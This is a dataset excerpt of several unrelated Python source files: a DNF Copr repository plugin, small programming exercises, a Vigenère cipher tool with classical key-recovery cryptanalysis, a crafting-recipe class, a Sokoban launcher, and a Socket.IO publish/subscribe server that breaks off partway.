print(msg)\n return old_repo\n\n def _list_installed_repositories(self, directory, enabled_only, disabled_only):\n old_repo = False\n for repo_id, repo in self.base.repos.items():\n if self._list_repo_file(repo_id, repo, enabled_only, disabled_only):\n old_repo = True\n if old_repo:\n print(_(\"* These coprs have repo file with an old format that contains \"\n \"no information about Copr hub - the default one was assumed. \"\n \"Re-enable the project to fix this.\"))\n\n def _list_user_projects(self, user_name):\n # http://copr.fedorainfracloud.org/api/coprs/ignatenkobrain/\n api_path = \"/api/coprs/{}/\".format(user_name)\n res = self.base.urlopen(self.copr_url + api_path, mode='w+')\n try:\n json_parse = json.loads(res.read())\n except ValueError:\n raise dnf.exceptions.Error(\n _(\"Can't parse repositories for username '{}'.\")\n .format(user_name))\n self._check_json_output(json_parse)\n section_text = _(\"List of {} coprs\").format(user_name)\n self._print_match_section(section_text)\n i = 0\n while i < len(json_parse[\"repos\"]):\n msg = \"{0}/{1} : \".format(user_name,\n json_parse[\"repos\"][i][\"name\"])\n desc = json_parse[\"repos\"][i][\"description\"]\n if not desc:\n desc = _(\"No description given\")\n msg = self.base.output.fmtKeyValFill(ucd(msg), desc)\n print(msg)\n i += 1\n\n def _search(self, query):\n # http://copr.fedorainfracloud.org/api/coprs/search/tests/\n api_path = \"/api/coprs/search/{}/\".format(query)\n res = self.base.urlopen(self.copr_url + api_path, mode='w+')\n try:\n json_parse = json.loads(res.read())\n except ValueError:\n raise dnf.exceptions.Error(_(\"Can't parse search for '{}'.\"\n ).format(query))\n self._check_json_output(json_parse)\n section_text = _(\"Matched: {}\").format(query)\n self._print_match_section(section_text)\n i = 0\n while i < len(json_parse[\"repos\"]):\n msg = \"{0}/{1} : \".format(json_parse[\"repos\"][i][\"username\"],\n json_parse[\"repos\"][i][\"coprname\"])\n desc = json_parse[\"repos\"][i][\"description\"]\n if not desc:\n desc = _(\"No description given.\")\n msg = self.base.output.fmtKeyValFill(ucd(msg), desc)\n print(msg)\n i += 1\n\n def _print_match_section(self, text):\n formatted = self.base.output.fmtSection(text)\n print(formatted)\n\n def _ask_user(self, msg):\n if self.base._promptWanted():\n if self.base.conf.assumeno or not self.base.output.userconfirm(\n msg='{} [y/N]: '.format(msg), defaultyes_msg='{} [Y/n]: '.format(msg)):\n raise dnf.exceptions.Error(_('Safe and good answer. Exiting.'))\n\n @classmethod\n def _need_root(cls):\n # FIXME this should do dnf itself (BZ#1062889)\n if os.geteuid() != 0:\n raise dnf.exceptions.Error(\n _('This command has to be run under the root user.'))\n\n @staticmethod\n def _guess_chroot(chroot_config):\n \"\"\" Guess which chroot is equivalent to this machine \"\"\"\n # FIXME Copr should generate non-specific arch repo\n dist = chroot_config\n if dist is None or (dist[0] is False) or (dist[1] is False):\n dist = linux_distribution()\n if \"Fedora\" in dist:\n # x86_64 because repo-file is same for all arch\n # ($basearch is used)\n if \"Rawhide\" in dist:\n chroot = (\"fedora-rawhide-x86_64\")\n else:\n chroot = (\"fedora-{}-x86_64\".format(dist[1]))\n elif \"Mageia\" in dist:\n # Get distribution architecture (Mageia does not use $basearch)\n distarch = rpm.expandMacro(\"%{distro_arch}\")\n # Set the chroot\n if \"Cauldron\" in dist:\n chroot = (\"mageia-cauldron-{}\".format(distarch))\n else:\n chroot = (\"mageia-{0}-{1}\".format(dist[1], distarch))\n elif \"openSUSE\" in dist:\n # Get distribution architecture (openSUSE does not use $basearch)\n distarch = rpm.expandMacro(\"%{_target_cpu}\")\n # Set the chroot\n if \"Tumbleweed\" in dist:\n chroot = (\"opensuse-tumbleweed-{}\".format(distarch))\n else:\n chroot = (\"opensuse-leap-{0}-{1}\".format(dist[1], distarch))\n else:\n chroot = (\"epel-%s-x86_64\" % dist[1].split(\".\", 1)[0])\n return chroot\n\n def _download_repo(self, project_name, repo_filename, chroot=None):\n if chroot is None:\n chroot = self._guess_chroot(self.chroot_config)\n short_chroot = '-'.join(chroot.split('-')[:2])\n #http://copr.fedorainfracloud.org/coprs/larsks/rcm/repo/epel-7-x86_64/\n api_path = \"/coprs/{0}/repo/{1}/\".format(project_name, short_chroot)\n\n try:\n f = self.base.urlopen(self.copr_url + api_path, mode='w+')\n except IOError as e:\n if os.path.exists(repo_filename):\n os.remove(repo_filename)\n if '404' in str(e):\n if PY3:\n import urllib.request\n try:\n res = urllib.request.urlopen(self.copr_url + \"/coprs/\" + project_name)\n status_code = res.getcode()\n except urllib.error.HTTPError as e:\n status_code = e.getcode()\n else:\n import urllib\n res = urllib.urlopen(self.copr_url + \"/coprs/\" + project_name)\n status_code = res.getcode()\n if str(status_code) != '404':\n raise dnf.exceptions.Error(_(\"This repository does not have\"\\\n \" any builds yet so you cannot enable it now.\"))\n else:\n raise dnf.exceptions.Error(_(\"Such repository does not exist.\"))\n raise\n\n for line in f:\n if re.match(\"\\[copr:\", line):\n repo_filename = os.path.join(self.base.conf.get_reposdir,\n \"_\" + line[1:-2] + \".repo\")\n break\n\n # if using default hub, remove possible old repofile\n if self.copr_url == self.default_url:\n # copr:hub:user:project.repo => _copr_user_project.repo\n old_repo_filename = repo_filename.replace(\"_copr:\", \"_copr\", 1)\\\n .replace(self.copr_hostname, \"\").replace(\":\", \"_\", 1).replace(\":\", \"-\")\\\n .replace(\"group_\", \"@\")\n if os.path.exists(old_repo_filename):\n os.remove(old_repo_filename)\n\n shutil.copy2(f.name, repo_filename)\n os.chmod(repo_filename, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)\n\n def _get_copr_repo(self, copr_username, copr_projectname):\n repo_id = \"copr:{0}:{1}:{2}\".format(self.copr_hostname,\n self._sanitize_username(copr_username),\n copr_projectname)\n if repo_id not in self.base.repos:\n # check if there is a repo with old ID format\n repo_id = repo_id = \"{0}-{1}\".format(self._sanitize_username(copr_username),\n copr_projectname)\n if repo_id in self.base.repos and \"_copr\" in self.base.repos[repo_id].repofile:\n file_name = self.base.repos[repo_id].repofile.split('/')[-1]\n copr_hostname = file_name.rsplit(':', 2)[0].split(':', 1)[1]\n if copr_hostname != self.copr_hostname:\n return None\n else:\n return None\n\n return self.base.repos[repo_id]\n\n def _remove_repo(self, copr_username, copr_projectname):\n # FIXME is it Copr repo ?\n repo = self._get_copr_repo(copr_username, copr_projectname)\n if not repo:\n raise dnf.exceptions.Error(\n _(\"Failed to remove copr repo {0}/{1}/{2}\"\n .format(self.copr_hostname, copr_username, copr_projectname)))\n try:\n os.remove(repo.repofile)\n except OSError as e:\n raise dnf.exceptions.Error(str(e))\n\n def _disable_repo(self, copr_username, copr_projectname):\n repo = self._get_copr_repo(copr_username, copr_projectname)\n if repo is None:\n raise dnf.exceptions.Error(\n _(\"Failed to disable copr repo {}/{}\"\n .format(copr_username, copr_projectname)))\n\n self.base.conf.write_raw_configfile(repo.repofile, repo.id,\n self.base.conf.substitutions, {\"enabled\": 0})\n\n @classmethod\n def _get_data(cls, f):\n \"\"\" Wrapper around response from server\n\n check data and print nice error in case of some error (and return None)\n otherwise return json object.\n \"\"\"\n try:\n output = json.loads(f.read())\n except ValueError:\n dnf.cli.CliError(_(\"Unknown response from server.\"))\n return\n return output\n\n @classmethod\n def _check_json_output(cls, json_obj):\n if json_obj[\"output\"] != \"ok\":\n raise dnf.exceptions.Error(\"{}\".format(json_obj[\"error\"]))\n\n @classmethod\n def _sanitize_username(cls, copr_username):\n if copr_username[0] == \"@\":\n return \"group_{}\".format(copr_username[1:])\n else:\n return copr_username\n\n\n@dnf.plugin.register_command\nclass PlaygroundCommand(CoprCommand):\n \"\"\" Playground plugin for DNF \"\"\"\n\n aliases = (\"playground\",)\n summary = _(\"Interact with Playground repository.\")\n usage = \" [enable|disable|upgrade]\"\n\n def _cmd_enable(self, chroot):\n self._need_root()\n msg = _(\"\"\"\nYou are about to enable a Playground repository.\n\nDo you want to continue?\"\"\")\n self._ask_user(msg)\n api_url = \"{0}/api/playground/list/\".format(\n self.copr_url)\n f = self.base.urlopen(api_url, mode=\"w+\")\n output = self._get_data(f)\n f.close()\n if output[\"output\"] != \"ok\":\n raise dnf.cli.CliError(_(\"Unknown response from server.\"))\n for repo in output[\"repos\"]:\n project_name = \"{0}/{1}\".format(repo[\"username\"],\n repo[\"coprname\"])\n repo_filename = \"{}/_playground_{}.repo\".format(self.base.conf.get_reposdir, project_name.replace(\"/\", \"-\"))\n try:\n if chroot not in repo[\"chroots\"]:\n continue\n api_url = \"{0}/api/coprs/{1}/detail/{2}/\".format(\n self.copr_url, project_name, chroot)\n f = self.base.urlopen(api_url, mode='w+')\n output2 = self._get_data(f)\n f.close()\n if (output2 and (\"output\" in output2)\n and (output2[\"output\"] == \"ok\")):\n self._download_repo(project_name, repo_filename, chroot)\n except dnf.exceptions.Error:\n # likely 404 and that repo does not exist\n pass\n\n def _cmd_disable(self):\n self._need_root()\n for repo_filename in glob.glob(\"{}/_playground_*.repo\".format(self.base.conf.get_reposdir)):\n self._remove_repo(repo_filename)\n\n @staticmethod\n def set_argparser(parser):\n parser.add_argument('subcommand', nargs=1,\n choices=['enable', 'disable', 'upgrade'])\n\n def run(self):\n subcommand = self.opts.subcommand[0]\n chroot = self._guess_chroot(self.chroot_config)\n if subcommand == \"enable\":\n self._cmd_enable(chroot)\n logger.info(_(\"Playground repositories successfully enabled.\"))\n elif subcommand == \"disable\":\n self._cmd_disable()\n logger.info(_(\"Playground repositories successfully disabled.\"))\n elif subcommand == \"upgrade\":\n self._cmd_disable()\n self._cmd_enable(chroot)\n logger.info(_(\"Playground repositories successfully updated.\"))\n else:\n raise dnf.exceptions.Error(\n _('Unknown subcommand {}.').format(subcommand))\n","repo_name":"praiskup/dnf-plugins-core","sub_path":"plugins/copr.py","file_name":"copr.py","file_ext":"py","file_size_in_byte":23950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"74007944746","text":"\"\"\"\nauthor: buppter\ndatetime: 2019/8/16 12:48\n\n\n题目描述\n将一个字符串转换成一个整数(实现Integer.valueOf(string)的功能,但是string不符合数字要求时返回0),\n要求不能使用字符串转换整数的库函数。 数值为0或者字符串不是一个合法的数值则返回0。\n\"\"\"\n\n\nclass Solution:\n def StrToInt(self, s: str) -> int:\n if not s:\n return 0\n flag = 1\n\n dic = {\"0\": 0, \"1\": 1, \"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5, \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9}\n if s[0] == \"-\":\n flag = -1\n s = s[1:]\n elif s[0] == \"+\":\n s = s[1:]\n res = 0\n count = 0\n\n for i in s[::-1]:\n if i in dic:\n res += dic[i] * pow(10, count)\n count += 1\n else:\n return 0\n\n return res * flag\n","repo_name":"buppter/algorithms","sub_path":"TargetOffer/把字符串转换成整数.py","file_name":"把字符串转换成整数.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"36676125244","text":"def main():\n\n\twhile True:\n\t\tx = int(input())\n\t\tif x == 0:\n\t\t\tbreak\n\t\tpares = []\n\n\t\t\n\t\tfor i in range(x,x+5):\n\t\t\tif x % 2 != 0:\n\t\t\t\tx = x+1\n\t\t\tif x % 2 == 0:\n\t\t\t\tpares.append(x)\n\t\t\t\tx += 2\n\n\t\tsoma = sum(pares)\n\t\tprint(soma)\n\t\tpares = []\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"vikvik98/Algoritmos_2017.1","sub_path":"Questões do URI/questao 1159.py","file_name":"questao 1159.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42723974303","text":"import itertools\nimport os\nimport re\nimport sys\nimport time\n\nfrom CiperOperations import frequentAnalysis, check_ifenglish\n\nLETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nNUM_MOST_FREQ_LETTERS = 4\nMAX_KEY_LENGTH = 16\nNONLETTERS_PATTERN = re.compile('[^A-Z]')\n\n\ndef findRepeatSequencesSpacings(message):\n message = NONLETTERS_PATTERN.sub('', message.upper())\n seqSpacings = {}\n for seqLen in range(3, 6):\n for seqStart in range(len(message) - seqLen):\n seq = message[seqStart:seqStart + seqLen]\n for i in range(seqStart + seqLen, len(message) - seqLen):\n if message[i:i + seqLen] == seq:\n if seq not in seqSpacings:\n seqSpacings[seq] = []\n seqSpacings[seq].append(i - seqStart)\n return seqSpacings\n\n\ndef getUsefulFactors(num):\n if num < 2:\n return []\n factors = []\n for i in range(2, MAX_KEY_LENGTH + 1):\n if num % i == 0:\n factors.append(i)\n otherFactor = int(num / i)\n if otherFactor < MAX_KEY_LENGTH + 1 and otherFactor != 1:\n factors.append(otherFactor)\n return list(set(factors))\n\n\ndef getItemAtIndexOne(items):\n return items[1]\n\n\ndef getMostCommonFactors(seqFactors):\n factorCounts = {}\n for seq in seqFactors:\n factorList = seqFactors[seq]\n for factor in factorList:\n if factor not in factorCounts:\n factorCounts[factor] = 0\n factorCounts[factor] += 1\n factorsByCount = []\n for factor in factorCounts:\n if factor <= MAX_KEY_LENGTH:\n factorsByCount.append((factor, factorCounts[factor]))\n factorsByCount.sort(key=getItemAtIndexOne, reverse=True)\n return factorsByCount\n\n\ndef kasiskiExamination(ciphertext):\n repeatedSeqSpacings = findRepeatSequencesSpacings(ciphertext)\n seqFactors = {}\n for seq in repeatedSeqSpacings:\n seqFactors[seq] = []\n for spacing in repeatedSeqSpacings[seq]:\n seqFactors[seq].extend(getUsefulFactors(spacing))\n factorsByCount = getMostCommonFactors(seqFactors)\n allLikelyKeyLengths = []\n for twoIntTuple in factorsByCount:\n allLikelyKeyLengths.append(twoIntTuple[0])\n return allLikelyKeyLengths\n\n\ndef getNthSubkeysLetters(nth, keyLength, message):\n message = NONLETTERS_PATTERN.sub('', message)\n i = nth - 1\n letters = []\n while i < len(message):\n letters.append(message[i])\n i += keyLength\n return ''.join(letters)\n\n\ndef attemptHackWithKeyLength(ciphertext, mostLikelyKeyLength):\n ciphertextUp = ciphertext.upper()\n allFreqScores = []\n for nth in range(1, mostLikelyKeyLength + 1):\n nthLetters = getNthSubkeysLetters(nth, mostLikelyKeyLength, ciphertextUp)\n freqScores = []\n for possibleKey in LETTERS:\n decryptedText, length = string_process('D', nthLetters, possibleKey)\n keyAndFreqMatchTuple = (possibleKey, frequentAnalysis.englishFreqMatchScore(decryptedText))\n freqScores.append(keyAndFreqMatchTuple)\n freqScores.sort(key=getItemAtIndexOne, reverse=True)\n allFreqScores.append(freqScores[:NUM_MOST_FREQ_LETTERS])\n for indexes in itertools.product(range(NUM_MOST_FREQ_LETTERS), repeat=mostLikelyKeyLength):\n possibleKey = ''\n for i in range(mostLikelyKeyLength):\n possibleKey += allFreqScores[i][indexes[i]][0]\n decryptedText,length = string_process('D', ciphertextUp, possibleKey)\n if check_ifenglish.check_ifenglish(decryptedText):\n origCase = []\n for i in range(len(ciphertext)):\n if ciphertext[i].isupper():\n origCase.append(decryptedText[i].upper())\n else:\n origCase.append(decryptedText[i].lower())\n decryptedText = ''.join(origCase)\n\n print('Possible encryption hack with key %s:' % (possibleKey))\n print(decryptedText[:200])\n print('Enter S if done, anything else to continue hacking:')\n response = input('> ')\n if response.strip().upper().startswith('D'):\n return decryptedText\n return None\n\n\ndef hackVigenere(ciphertext):\n allLikelyKeyLengths = kasiskiExamination(ciphertext)\n hackedMessage = None\n for keyLength in allLikelyKeyLengths:\n hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)\n if hackedMessage is not None:\n break\n if hackedMessage is None:\n for keyLength in range(1, MAX_KEY_LENGTH + 1):\n if keyLength not in allLikelyKeyLengths:\n hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)\n if hackedMessage is not None:\n break\n return hackedMessage\n\n\ndef hacker(message):\n hackedMessage = hackVigenere(message)\n if hackedMessage is not None:\n return hackedMessage, len(hackedMessage)\n else:\n print('Failed to hack encryption.')\n\n\ndef string_process(processType, message, key):\n if processType.upper().startswith('E') or processType.upper().startswith('D'):\n translated = []\n keyIndex = 0\n key = key.upper()\n for symbol in message:\n num = LETTERS.find(symbol.upper())\n if num != -1:\n if processType.upper().startswith('E'):\n num += LETTERS.find(key[keyIndex])\n elif processType.upper().startswith('D'):\n num -= LETTERS.find(key[keyIndex])\n num %= len(LETTERS)\n if symbol.isupper():\n translated.append(LETTERS[num])\n elif symbol.islower():\n translated.append(LETTERS[num].lower())\n keyIndex += 1\n if keyIndex == len(key):\n keyIndex = 0\n else:\n translated.append(symbol)\n return ''.join(translated), len(''.join(translated))\n elif processType.upper().startswith('H'):\n return hacker(message)\n\n\ndef file_process(processType, inputFile, outputFile, key):\n if not os.path.exists(inputFile):\n print('Input File not exists')\n sys.exit()\n if os.path.exists(outputFile):\n choice = input('Output File exists, Overwrite it?(Y/N)')\n if not choice.lower().startswith('y'):\n sys.exit()\n fileObj = open(inputFile)\n content = fileObj.read()\n fileObj.close()\n starttime = time.time()\n text, text_length = string_process(processType, content, key)\n totaltime = round(time.time() - starttime, 3)\n fileObj2 = open(outputFile, 'w')\n fileObj2.write(text)\n fileObj2.close()\n return totaltime\n\n\ndef vigenereCipher(objType, processType, **kwargs):\n \"\"\"\n :param objType: String/File\n :param processType: Encrypt/Decrypt/Hacker\n :param kwargs: message/key\n :return: text,length\n \"\"\"\n\n # Default values\n message, inputFile, outputFile, key = '', '', '', ''\n\n if kwargs:\n message = kwargs.get('message')\n key = kwargs.get('key')\n else:\n if objType.upper().startswith('S'):\n message = input('Enter Message:')\n if objType.upper().startswith('F'):\n inputFile = input('Enter InputFile:')\n outputFile = input('Enter OutputFile:')\n # encrypt & decrypt\n if not processType.upper().startswith('H'):\n key = input('Enter key (words):')\n\n # String\n if objType.upper().startswith('S'):\n return string_process(processType, message, key)\n\n # File\n elif objType.upper().startswith('F'):\n if processType.upper().startswith('E'):\n return 'Encrypt Succeed', file_process('E', inputFile, outputFile, key)\n elif processType.upper().startswith('D'):\n return 'Decrypt Succeed', file_process('D', inputFile, outputFile, key)\n elif processType.upper().startswith('H'):\n return 'Hacker Succeed', file_process('H', inputFile, outputFile, key)\n else:\n sys.exit('Enter Encrypt / Decrypt / Hacker')\n else:\n sys.exit('Enter String / File')\n","repo_name":"YizheZhang-Ervin/Knowledge_Cryptography","sub_path":"CipherAlgorithms/VigenereCipher.py","file_name":"VigenereCipher.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2974344741","text":"class craftItem:\n def __init__(self, name, variantBool = False, variant=[], origin=True):\n self.name = name\n self.variantBool = variantBool\n self.variant = variant\n self.origin = origin\n \n def __str__(self) -> str:\n return self.name\n\n def __repr__(self) -> str:\n return self.name\n\nclass craftStructure:\n def __init__(self):\n self.recipeDictionary = {}\n\n def addRecipe(self, target, materials):\n self.recipeDictionary[target] = materials\n\n def getRecipe(self, target):\n return self.recipeDictionary[target]\n\n def getOriginalRecipe(self, target, amount):\n originalRecipe = {}\n for item in self.recipeDictionary[target].keys():\n if item.origin:\n if item in originalRecipe:\n originalRecipe[item] = originalRecipe[item] + self.recipeDictionary[target][item]\n else:\n originalRecipe[item] = self.recipeDictionary[target][item]\n else:\n subRecipe = self.getOriginalRecipe(item, self.recipeDictionary[target][item])\n for subitem in subRecipe.keys():\n if subitem in originalRecipe:\n originalRecipe[subitem] = originalRecipe[subitem] + subRecipe[subitem]\n else:\n originalRecipe[subitem] = subRecipe[subitem]\n \n updateOriginalRecipe = {}\n for item in originalRecipe.keys():\n updateOriginalRecipe[item] = originalRecipe[item] * amount\n \n return updateOriginalRecipe","repo_name":"greablezzq/CRL_Environment","sub_path":"ClassCraftStructure.py","file_name":"ClassCraftStructure.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24422796026","text":"from PyQt5.QtWidgets import (QWidget, QGridLayout,QPushButton, QApplication, QLabel, QMenuBar,QMessageBox)\nfrom PyQt5 import QtGui\nfrom sokobanModel import SokobanModel\nfrom sokobanView import sokobanView\nfrom sokobanController import sokobanController\nimport sys,os\niconroot = os.path.dirname(__file__)\n\n\napp = QApplication(sys.argv)\n\nmodel = SokobanModel()\ncontroller = sokobanController()\nview = sokobanView()\n\nmodel.addView(view)\nview.setModel(model)\nview.setController(controller)\n\ncontroller.setModel(model)\ncontroller.setView(view)\ncontroller.setLevel(1)\nmodel.getMainCharacter()\nmodel.setPiece()\n\nview.show()\n\nsys.exit(app.exec_())","repo_name":"Samuel-Ternisien/Sokoban","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40521579774","text":"\"\"\"Server for publisher subscriber system. For more information, please run `python server.py --help`\"\"\"\n\nimport asyncio\nimport logging\nimport time\nimport functools\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nfrom threading import Lock, Thread\nfrom typing import List, Optional, Union, Dict\n\nimport socketio\nfrom aiohttp import web\n\nfrom transport_message import TransportMessage\n\n\n## Setup logging ##\n# Set all loggers to ERROR level\nloggers = [logging.getLogger(name) for name in logging.root.manager.loggerDict]\nfor logger in loggers:\n logger.setLevel(logging.ERROR)\n\n# Set server logger to INFO level\n# Create file handler which logs even debug messages\nfile_handler = logging.FileHandler(\"server.log\")\nfile_handler.setLevel(logging.DEBUG)\n\n# Create console handler\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.DEBUG)\n\n# Create formatter and add it to the handlers\nformatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\nfile_handler.setFormatter(formatter)\nconsole_handler.setFormatter(formatter)\n\n# Add the handlers to the logger\nlogging.getLogger().addHandler(file_handler)\nlogging.getLogger().addHandler(console_handler)\nlogging.getLogger().setLevel(logging.DEBUG)\n\n# logging.basicConfig(level=logging.INFO, format=\"%(asctime)s - %(levelname)s - %(message)s\")\n\n\nclass ParallelTimer(Thread):\n \"\"\"Class to manage a parallel timer in different thread on the server triggering a heart beat algorithm every 20 seconds.\"\"\"\n\n def __init__(self, server) -> None:\n \"\"\"Constructor of ParallelTimer class.\n\n :param server: server object\n \"\"\"\n super().__init__()\n self.server = server\n\n def run(self):\n \"\"\"\n Starting parallel timer in loop.\n \"\"\"\n while 1:\n heartbeat = self.server.heart_beat(20)\n asyncio.run(heartbeat)\n\n\nclass Topic:\n \"\"\"Class to manage the Topics with needed data.\"\"\"\n\n name: Union[None, str] = None\n \"\"\"name of the topic\"\"\"\n content: Union[None, str] = None\n \"\"\"content of the topic\"\"\"\n subscribers: List[str] = []\n \"\"\"list of subscribers\"\"\"\n timestamp: Union[None, int] = None\n \"\"\"timestamp\"\"\"\n last_update: Union[None, int] = None\n \"\"\"last update of topic\"\"\"\n\n\nclass Server:\n def __init__(self) -> None:\n self._list_of_topics: List[Topic] = []\n self._sid_ip_mapping: Dict[str, str] = {}\n self._lock = Lock()\n\n self.sio = socketio.AsyncServer(\n async_mode=\"aiohttp\", cors_allowed_origins=\"*\", logger=False, engineio_logger=False\n )\n self.sio.event(self.connect)\n self.sio.on(\"SUBSCRIBE_TOPIC\", self.handle_subscribe)\n self.sio.on(\"UNSUBSCRIBE_TOPIC\", self.handle_unsubscribe)\n self.sio.on(\"PUBLISH_TOPIC\", self.handle_publish)\n self.sio.on(\"LIST_TOPICS\", self.handle_list_topics)\n self.sio.on(\"GET_TOPIC_STATUS\", self.handle_topic_status)\n\n def _check_data_none_decorator(func):\n \"\"\"Decorator for checking if data is None.\n If data is None, the client will receive an error message.\n \"\"\"\n\n @functools.wraps(func)\n async def wrapper(self, *args, **kwargs):\n sid = args[0]\n data = args[1] if len(args) > 1 else None\n if data is None:\n response = TransportMessage(\n timestamp=int(time.time()), payload=\"Missing payload of type TransportMessage.\"\n )\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.error(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n return None\n return await func(self, *args, **kwargs)\n\n return wrapper\n\n def _check_topic_decorator(func):\n \"\"\"Decorator for checking if topic exists.\n If topic does not exist, the client will receive an error message.\n \"\"\"\n\n @functools.wraps(func)\n async def wrapper(self, *args, **kwargs):\n sid = args[0]\n data = args[1] if len(args) > 1 else None\n try:\n parsed_data = TransportMessage.parse_raw(data)\n except Exception:\n response = TransportMessage(timestamp=int(time.time()), payload=\"Invalid payload.\")\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.error(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n return None\n\n # Check if data contains topic\n if parsed_data.topic is None:\n response = TransportMessage(timestamp=int(time.time()), payload=\"Missing parameter topic.\")\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.error(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n return None\n return await func(self, *args, **kwargs)\n\n return wrapper\n\n async def connect(self, sid, environ, auth=None):\n \"\"\"Called when a client connects to the server.\n\n :param sid: Generated session id\n :param environ: Environment variables\n :param auth: Unused\n \"\"\"\n logging.info(\"%s - SID: %s connected\", environ[\"aiohttp.request\"].remote, sid)\n self._sid_ip_mapping[sid] = environ[\"aiohttp.request\"].remote\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_subscribe(self, sid, data=None) -> None:\n \"\"\"Called when a client subscribes to a topic.\n If the topic does not exist, it will be created. If the client is already subscribed to the topic, nothing\n changes. Otherwise the client will be subscribed to the topic and will receive updates.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n if topic is not None:\n # Check if sid already subscribed to topic\n if sid in topic.subscribers:\n response = TransportMessage(timestamp=int(time.time()), payload=f\"Already subscribed to {data.topic}.\")\n else:\n # Subscribe to topic\n topic.subscribers.append(sid)\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Successfully subscribed to {data.topic}.\"\n )\n else:\n # Create new topic if not already existing and subscribe\n new_topic = Topic()\n new_topic.name = data.topic\n new_topic.subscribers.append(sid)\n self._add_topic(new_topic)\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Created {data.topic} and successfully subscribed.\"\n )\n\n await self.sio.emit(\"PRINT_MESSAGE\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_unsubscribe(self, sid, data=None) -> None:\n \"\"\"Called when a client unsubscribes from a topic.\n If the client is not subscribed to the topic or topic does not exist, the client will receive an error message.\n Otherwise the client will be unsubscribed from the topic and will not receive any updates.\n If the topic has no subscribers left it will be deleted.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n\n if topic is not None:\n # Check if sid subscribed to topic and unsubscribe\n if sid in topic.subscribers:\n topic.subscribers.remove(sid)\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Successfully unsubscribed from {data.topic}.\"\n )\n # Delete topic if no subscribers left\n if len(topic.subscribers) == 0:\n self._remove_topic(topic)\n else:\n # Not subscribed\n response = TransportMessage(timestamp=int(time.time()), payload=f\"Not subscribed to {data.topic}.\")\n\n else:\n # Topic not existing\n response = TransportMessage(timestamp=int(time.time()), payload=f\"{data.topic} does not exist.\")\n\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_publish(self, sid, data=None) -> None:\n \"\"\"Called when a client publishes a message to a topic.\n The message will be published to the topic and all subscribers will receive the message.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n\n # Check if data contains payload\n if data.payload is None:\n response = TransportMessage(timestamp=int(time.time()), payload=\"Missing parameter message.\")\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n return None\n\n if topic is not None:\n # Publish message to topic\n topic.content = data.payload\n topic.timestamp = data.timestamp\n response = TransportMessage(\n timestamp=int(time.time()), payload=f\"Successfully published message to {data.topic}.\"\n )\n await self.update_topic(topic)\n else:\n # Topic not existing\n response = TransportMessage(timestamp=int(time.time()), payload=f\"{data.topic} does not exist.\")\n\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n async def handle_list_topics(self, sid, data=None) -> None:\n \"\"\"Called when a client requests a list of all topics.\n The client will receive a list of all topics.\n\n :param sid: Generated session id\n :param data: Data sent by the client. Unused\n \"\"\"\n response_msg = \"All topics on the server:\"\n for topic in self._list_of_topics:\n response_msg += f\"\\n{topic.name}\"\n\n response = TransportMessage(timestamp=int(time.time()), payload=response_msg)\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_topic_status(self, sid, data=None) -> None:\n \"\"\"Called when a client requests the status of a topic.\n The client will receive the status of the topic.\n\n :param sid: Generated session id\n :param data: Data sent by the client\n \"\"\"\n\n data = TransportMessage.parse_raw(data)\n topic = self._get_topic_by_name(data.topic)\n\n if topic is not None:\n subscribers = \"\"\n for subscriber in topic.subscribers:\n subscribers += 